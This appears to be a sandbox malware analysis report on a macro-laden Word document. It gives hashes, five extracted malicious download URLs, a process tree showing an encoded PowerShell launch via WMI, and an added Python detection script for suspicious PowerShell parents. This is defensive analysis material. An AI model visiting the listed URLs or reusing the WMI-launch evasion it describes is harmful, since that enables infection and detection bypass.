Analysis

max time kernel: 171s
max time network: 176s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 22-05-2022 05:53
Static task: static1

Behavioral task: behavioral1
  Sample: wtvkrclp.doc
  Resource: win7-20220414-en

Behavioral task: behavioral2
  Sample: wtvkrclp.doc
  Resource: win10v2004-20220414-en

The signatures, process tree and memory dumps below come from the windows10-2004_x64 run (behavioral2, resource win10v2004-20220414-en, matching the platform and resource in the Analysis header).
General

Target: wtvkrclp.doc
Size: 169KB
MD5: 9bcd7831593b18eb2fc20abb950776e0
SHA1: 94fce0e45271cd1dc5ff594f886146c88b5bdf75
SHA256: 2e480d827237d7ae78d5b296e18e6a0cd466c5f3e09abf96f8bb53d927c4bab8
SHA512: ce5e923278b315e334274b0b1f9434aaa2851135fb0fb4f147b8e123da1f595e50a70fc47079f8f3c8c5c6a43f9b5b04a5dbf799f29491bb73d716304892dfdc
Malware Config

Extracted URLs (indicators from the sample; do not visit them, use them for blocking and log searches):
  http://sampling-group.com/J0Eubtq06/
  http://www.weddingsday.co.uk/docs/1oYncTNHDu/
  http://sasystemsuk.com/recruit/sl979/
  http://wellparts.net/cgi-bin/qAj081/
  http://volkanakbalik.com/_inc/2W/
Signatures

Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro. Note that the recorded parent here is wmiprvse.exe (the WMI provider host), not WINWORD.EXE: that is what a macro that starts PowerShell through WMI (Win32_Process Create) looks like, because WMI launches the child on the macro's behalf. A detection keyed only on an Office application being the direct parent of PowerShell does not fire on this chain.

  description                                                                          pid   pid_target  process
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   4568  5064        powersheLL.exe
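The check below is an added Python example of the detection this signature describes; it is not Triage's rule. It runs over constructed process-creation records (loosely shaped like Sysmon Event ID 1; none are from the report), flags PowerShell launched from a parent on an assumed deny-list that includes wmiprvse.exe and the Office applications, compares image names case-insensitively so that a mixed-case spelling such as powersheLL.exe still matches, and records whether the command line carries an -EncodedCommand script.

```python
"""Detection logic for "process spawned unexpected child process".

Runs over constructed process-creation records (shape loosely modelled on
Sysmon Event ID 1). Added example; none of the records are from the report.
"""
import ntpath

# Parents from which a PowerShell launch is treated as hostile on a user
# workstation. An assumed deny-list for this example, not taken from the report.
SUSPICIOUS_PARENTS = {
    "wmiprvse.exe",   # WMI provider host: how a macro's Win32_Process Create shows up
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "mshta.exe", "wscript.exe", "cscript.exe",
}
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# Spellings powershell.exe accepts for -EncodedCommand: it documents -ec and -e
# as short forms and also takes any unambiguous prefix of the full name.
ENCODED_SWITCHES = {"-e", "-ec", "-enc", "-encodedcommand"}


def image_name(path):
    """Case-folded basename. Windows file names are case-insensitive, so
    'powersheLL.exe' and 'PowerShell.exe' name the same binary."""
    return ntpath.basename(path).lower()


def has_encoded_command(command_line):
    """True if the command line passes a Base64 script via -EncodedCommand."""
    for token in command_line.split():
        t = token.lower()
        if t in ENCODED_SWITCHES or (len(t) > 2 and "-encodedcommand".startswith(t)):
            return True
    return False


def flag_unexpected_parent(events):
    """One finding per PowerShell process whose parent is on the deny-list."""
    findings = []
    for ev in events:
        if image_name(ev["image"]) not in POWERSHELL_HOSTS:
            continue
        parent = image_name(ev["parent_image"])
        if parent in SUSPICIOUS_PARENTS:
            findings.append({
                "pid": ev["pid"],
                "parent_pid": ev["parent_pid"],
                "parent": parent,
                "encoded": has_encoded_command(ev["command_line"]),
            })
    return findings


# Constructed sample records. Record 2 mimics the shape of the report's finding
# (mixed-case image name, wmiprvse.exe parent, -e switch); its Base64 is just
# 'dir' in UTF-16LE, not the real payload. Record 4 is a direct Office-to-
# PowerShell launch for contrast. PIDs other than 4188/4568 are invented.
EVENTS = [
    {"pid": 4188, "parent_pid": 1234,
     "image": r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": '"WINWORD.EXE" /n "wtvkrclp.doc"'},
    {"pid": 4568, "parent_pid": 5064,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe",
     "parent_image": r"C:\Windows\system32\wbem\wmiprvse.exe",
     "command_line": "powersheLL -e ZABpAHIA"},
    {"pid": 7000, "parent_pid": 1234,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe"},
    {"pid": 7100, "parent_pid": 4188,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
     "command_line": "PowerShell -ExecutionPolicy Bypass -File C:\\Users\\Public\\x.ps1"},
]

if __name__ == "__main__":
    for finding in flag_unexpected_parent(EVENTS):
        print(finding)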
Blocklisted process makes network request 2 IoCs
Processes:
powersheLL.exeflow pid process 26 4568 powersheLL.exe 45 4568 powersheLL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4188 WINWORD.EXE 4188 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powersheLL.exepid process 4568 powersheLL.exe 4568 powersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 4568 powersheLL.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 4188 WINWORD.EXE 4188 WINWORD.EXE 4188 WINWORD.EXE 4188 WINWORD.EXE 4188 WINWORD.EXE 4188 WINWORD.EXE 4188 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\wtvkrclp.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e 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1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/4188-136-0x00007FFAB92B0000-0x00007FFAB92C0000-memory.dmpFilesize
64KB
-
memory/4188-130-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-131-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-133-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-134-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-135-0x00007FFAB92B0000-0x00007FFAB92C0000-memory.dmpFilesize
64KB
-
memory/4188-132-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-137-0x000002B6FFC30000-0x000002B6FFC34000-memory.dmpFilesize
16KB
-
memory/4188-141-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-144-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-143-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-142-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4568-138-0x0000018CAA620000-0x0000018CAA642000-memory.dmpFilesize
136KB
-
memory/4568-139-0x00007FFAD08C0000-0x00007FFAD1381000-memory.dmpFilesize
10.8MB